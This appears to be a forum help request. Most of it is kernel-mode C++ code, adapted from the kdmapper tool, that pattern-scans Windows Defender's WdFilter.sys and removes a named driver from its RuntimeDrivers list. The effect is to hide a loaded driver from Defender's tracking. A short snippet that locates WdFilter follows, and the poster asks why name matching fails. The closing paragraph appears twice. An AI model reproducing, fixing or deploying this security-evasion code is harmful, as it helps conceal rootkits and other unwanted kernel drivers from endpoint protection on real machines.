auto RuntimeDriversList = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
"48 8B 0D ? ? ? ? FF 05");
if (!RuntimeDriversList) return false;
auto RuntimeDriversCountRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
"FF 05 ? ? ? ? 48 39 11");
if (!RuntimeDriversCountRef) return false;
auto MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
"49 8B C9 ? 89 ? 08 E8 ? ? ? ? ? ? ? ? ? ? ? E9");
if (!MpFreeDriverInfoExRef) {
MpFreeDriverInfoExRef = (ULONG64)FindPattern_Wrapper((PUCHAR)WdFilter, WdFilterSize,
"48 89 4A ? 49 8B ? E8 ? ? ? ? ? ? ? ? ? ? ? E9");
if (!MpFreeDriverInfoExRef) return false;
}
MpFreeDriverInfoExRef += 0x7; // skip until call instruction
RuntimeDriversList = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversList, 3);
ULONG64 RuntimeDriversList_Head = RuntimeDriversList - 0x8;
ULONG64 RuntimeDriversCount = (ULONG64)ResolveRelativeAddress((LPBYTE)RuntimeDriversCountRef, 2);
ULONG64 RuntimeDriversArray = RuntimeDriversCount + 0x8;
RuntimeDriversArray = *(ULONG64*)RuntimeDriversArray;
ULONG64 MpFreeDriverInfoEx = (ULONG64)ResolveRelativeAddress((LPBYTE)MpFreeDriverInfoExRef, 1);
for (PLIST_ENTRY Entry = *(PLIST_ENTRY*)(RuntimeDriversList_Head);
Entry != (LIST_ENTRY*)RuntimeDriversList_Head;
Entry = Entry->Flink)
{
//PUNICODE_STRING Unicode_String = (PUNICODE_STRING)((ULONG64)Entry + 0x10);
UNICODE_STRING Unicode_String = *(UNICODE_STRING*)(Entry + 0x10);
if (MmIsAddressValid(Unicode_String.Buffer)) {
LogInfo(0, "Found Driver: %ws", Unicode_String.Buffer);
if (wcsstr(name, Unicode_String.Buffer)) {
//remove from RuntimeDriversArray
bool removedRuntimeDriversArray = false;
PVOID SameIndexList = (PVOID)((ULONG64)Entry - 0x10);
for (int k = 0; k < 256; k++) { // max RuntimeDriversArray elements
PVOID value = *(PVOID*)(RuntimeDriversArray + (k * 8));
if (value == SameIndexList) {
PVOID emptyval = (PVOID)(RuntimeDriversCount + 1); // this is not count+1 is position of cout addr+1
*(PVOID*)(RuntimeDriversArray + (k * 8)) = emptyval;
removedRuntimeDriversArray = true;
break;
}
}
if (!removedRuntimeDriversArray) return false;
auto NextEntry = Entry->Flink;
auto PrevEntry = Entry->Blink;
NextEntry->Blink = PrevEntry;
PrevEntry->Flink = NextEntry;
// decrement RuntimeDriversCount
*(ULONG*)RuntimeDriversCount = *(ULONG*)RuntimeDriversCount - 1;
// call MpFreeDriverInfoEx
ULONG64 DriverInfo = (ULONG64)Entry - 0x20;
//verify DriverInfo Magic
USHORT Magic = *(USHORT*)DriverInfo;
if (Magic != 0xDA18) {
//Log("[!] DriverInfo Magic is invalid, new wdfilter version?, driver info will not be released to prevent bsod" << std::endl);
}
else {
using MpFreeDriverInfoExFn = void(__fastcall*)(ULONG64);
MpFreeDriverInfoExFn MpFreeDriverInfoEx_ = (MpFreeDriverInfoExFn)MpFreeDriverInfoEx;
MpFreeDriverInfoEx_(DriverInfo);
}
//LogInfo(0, "WdFilterDriverList Cleaned: %s\n", Unicode_String.Buffer);
return true;
}
}
}
return false;
This code was largely taken from kdmapper and converted to kernel-mode code, but there are some problems: it is unable to match the loaded driver name against the entries in the RuntimeDrivers list.
`
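/// First step of clear_wd_filter_driver_list: locate the loaded WdFilter.sys
/// image (base and size). The rest of the body -- the pattern scans over the
/// image and the RuntimeDrivers list walk that compares entry names against
/// `name` -- is the fragment posted above this snippet.
///
/// @param name  Driver name the list walk matches entries against.
/// @return false when WdFilter.sys is not loaded or its image size is
///         unknown; both the base and the size feed the pattern scans.
bool clear_wd_filter_driver_list(const wchar_t* name)
{
    // NOTE(review): in kernel mode an unconditional DbgBreakPoint() with no
    // kernel debugger attached is an unhandled breakpoint exception, i.e. a
    // bugcheck. Keep it debug-only so a release build can never hit it.
#if DBG
    DbgBreakPoint();
#endif
    ULONG WdFilterSize = 0;
    const auto WdFilter = (ULONG64)GetSystemModuleBase(L"WdFilter.sys", &WdFilterSize);
    // A base with a zero size would make every FindPattern scan over the image
    // fail anyway; reject it up front so the failure is explicit.
    if (WdFilter == 0 || WdFilterSize == 0) return false;
    // The posted snippet ends here. Falling off the end of a bool function is
    // undefined behaviour, so return explicitly.
    return false;
}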
`
This code was largely taken from kdmapper and converted to kernel-mode code, but there are some problems: it is unable to match the loaded driver name against the entries in the RuntimeDrivers list.